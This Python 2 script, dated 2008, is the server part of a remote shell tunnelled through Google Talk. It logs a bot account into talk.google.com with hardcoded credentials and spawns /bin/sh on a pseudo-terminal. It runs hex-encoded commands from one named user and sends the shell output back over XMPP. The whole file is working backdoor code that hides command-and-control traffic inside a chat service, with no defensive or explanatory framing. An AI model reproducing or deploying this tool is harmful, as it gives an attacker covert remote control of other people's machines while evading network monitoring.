#!/usr/bin/python
# Shell with TTY through a GTalk (jabber) session
# server part
# devloop.lyua.org april 2008
import socket,termios,pty,sys,select,os,time
import xmpp

nick="leet.master" # username allowed to send commands to the shell

botname="robot" # username of the bot
botpass="p4ss" # password for the account
master_fd=None

def messageCB(conn,mess):
    text=mess.getBody()
    user=mess.getFrom().getNode()
    if user==nick:
      if text!=None:
        os.write(master_fd,text.decode("hex_codec"))
        buff=""
        while True:
          inputready,outputready,exceptready=select.select([master_fd],[],[],0.4)
          if inputready==[]:
            if buff!="":
              conn.send(xmpp.Message(nick+"@gmail.com",buff.encode('hex_codec')) )
              buff=""
            else: return
          else:
            buff+=os.read(master_fd,1)
            if buff=="": return
            if len(buff)>256:
              conn.send(xmpp.Message(nick+"@gmail.com",buff.encode('hex_codec')) )
              time.sleep(1)
              buff=""

def presenceCB(conn,status):
  print status.getFrom().getNode()
  if status.getType()=="unavailable":
    print "is unavailable"
  else: print "is online"

def StepOn(conn):
    try:
        conn.Process(1)
    except KeyboardInterrupt: return 0
    return 1

def GoOn(conn):
    while StepOn(conn): pass

conn=xmpp.Client('gmail.com',debug=[])
conres=conn.connect(server=('talk.google.com',5223))
if not conres:
    print "Unable to connect to server !"
    sys.exit(1)
if conres<>'tls':
    print "Warning: unable to estabilish secure connection - TLS failed!"
authres=conn.auth(botname,botpass)
if not authres:
    print "Unable to authorize on %s - check login/password."%server
    sys.exit(1)
if authres<>'sasl':
    print "Warning: unable to perform SASL auth os %s. Old authentication method used!"%server
conn.RegisterHandler('message',messageCB)
conn.RegisterHandler('presence',presenceCB)
conn.sendInitPresence()
print "Bot started."
master,slave=pty.openpty()
pid,master_fd=pty.fork()
if pid==0: #child
  os.execl("/bin/sh")
  exit(0)
else:
  GoOn(conn)
